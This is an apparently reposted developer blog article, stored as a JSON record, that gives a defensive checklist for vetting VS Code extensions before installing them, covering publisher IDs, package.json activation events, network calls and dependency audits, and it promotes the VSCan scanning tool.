{"slug": "how-to-actually-check-if-a-vs-code-extension-is-safe-before-you-install-it", "title": "How to Actually Check if a VS Code Extension is Safe Before You Install It", "summary": "A developer has outlined a practical method for vetting VS Code extensions before installation, emphasizing that extensions run with full access to sensitive files like `.env` and SSH keys. The process includes checking the publisher ID, examining `package.json` for `activationEvents` and network calls, and auditing dependencies for known vulnerabilities. Tools like VSCan can automate this security review, as the threat model for developer tools has shifted from theoretical to active attacks, including credential-harvesting extensions with millions of installs.", "body_md": "You're about to install a VS Code extension. Maybe it's a formatter, a linter, a theme, an AI tool. You search, you find it, it has decent reviews. You click Install.\n\nBut here's what you probably didn't check — and what almost nobody does.\n\nBefore we get into how to evaluate one, it's worth being clear about what you're giving permission for. VS Code extensions run with full access to:\n\n`.env`\n\nfiles, and access your SSH keys.This isn't hypothetical. Extensions with millions of installs have been caught doing exactly these things.\n\nHere's what a 60-second review actually looks like:\n\nAnyone can publish to the VS Code Marketplace. The publisher ID is the only stable identifier — the display name can be anything, and typosquatting is real.\n\n`devtools-pro-2024`\n\nis worth extra scrutiny.An extension that hasn't been touched in 2+ years is a supply chain risk waiting to happen. Old dependencies, unmaintained code, and abandoned repos are exactly how attackers get in — either by compromising the account or injecting into a dependency.\n\nLook at the \"Last Updated\" date on the Marketplace listing. Then open the GitHub repo (if it exists) and check the actual commit history. Sometimes the Marketplace listing shows a recent publish date that just reflects an automated re-publish, not real maintenance.\n\n`package.json`\n\npermissions before installing\nEvery extension declares what it can do in its `package.json`\n\n. You can find this in the source repo. Look for:\n\n`activationEvents`\n\n— when does this extension activate? `*`\n\nmeans it runs on every file you open.`contributes.commands`\n\n— what commands does it register?`*`\n\nand makes network calls is doing something the moment you open VS Code, before you've even used it.This takes 2 minutes if there's a public repo. Clone it or browse it on GitHub and look for:\n\n```\nfetch(\naxios\nhttp.request\nhttps.request\nxhr\nWebSocket\n```\n\nAre those calls going to localhost, or to an external server? What data is in the request body? A linter that phones home is a red flag. A language server that connects to a known service is expected.\n\nThe extension's own code might be clean. Its dependencies might not be. Look at the `package.json`\n\nfor third-party packages, then check them against known vulnerability databases. A single compromised npm package can turn a legitimate extension malicious overnight — this is exactly how supply chain attacks work.\n\nThis is tedious to do manually. Tools like [VSCan](https://vscan.dev) automate it — paste in an extension ID and get a report on permissions, dependency vulnerabilities, and behavioral flags in seconds.\n\nNot all of these are disqualifying, but each one deserves a second look:\n\nSome of the most dangerous extensions are the popular ones, because they're the ones attackers target. If you have any of these installed, it's worth running a quick check:\n\nBefore installing any new extension:\n\n```\n# List all installed extensions\ncode --list-extensions\n```\n\nFor anything you don't recognize or haven't used recently: uninstall first, reinstall if you actually need it.\n\nA year ago, the threat model for developer tools was mostly theoretical. It's not anymore.\n\nWe've seen self-propagating worms targeting VS Code extensions. We've seen extensions with millions of downloads caught harvesting credentials. Microsoft's own telemetry has flagged thousands of extensions with suspicious behaviors.\n\nThe attack surface is your entire development environment — your code, your credentials, your git history, your cloud provider tokens. Developers are high-value targets precisely because of what they have access to.\n\nThe VS Code Marketplace is not curated the way the iOS App Store is. It's closer to npm: anyone can publish, automated scanning catches some things but not everything, and you're largely responsible for what you run.\n\nThat's not a reason to avoid extensions. It's a reason to take 60 seconds before you click Install.\n\n*Check your extensions at vscan.dev*", "url": "https://wpnews.pro/news/how-to-actually-check-if-a-vs-code-extension-is-safe-before-you-install-it", "canonical_source": "https://dev.to/ishaan_agrawal/how-to-actually-check-if-a-vs-code-extension-is-safe-before-you-install-it-3pal", "published_at": "2026-06-12 02:54:53+00:00", "updated_at": "2026-06-12 03:42:16.039792+00:00", "lang": "en", "topics": ["ai-tools", "ai-products", "ai-safety", "ai-ethics", "ai-infrastructure"], "entities": ["VS Code", "VS Code Marketplace", "GitHub"], "alternates": {"html": "https://wpnews.pro/news/how-to-actually-check-if-a-vs-code-extension-is-safe-before-you-install-it", "markdown": "https://wpnews.pro/news/how-to-actually-check-if-a-vs-code-extension-is-safe-before-you-install-it.md", "text": "https://wpnews.pro/news/how-to-actually-check-if-a-vs-code-extension-is-safe-before-you-install-it.txt", "jsonld": "https://wpnews.pro/news/how-to-actually-check-if-a-vs-code-extension-is-safe-before-you-install-it.jsonld"}}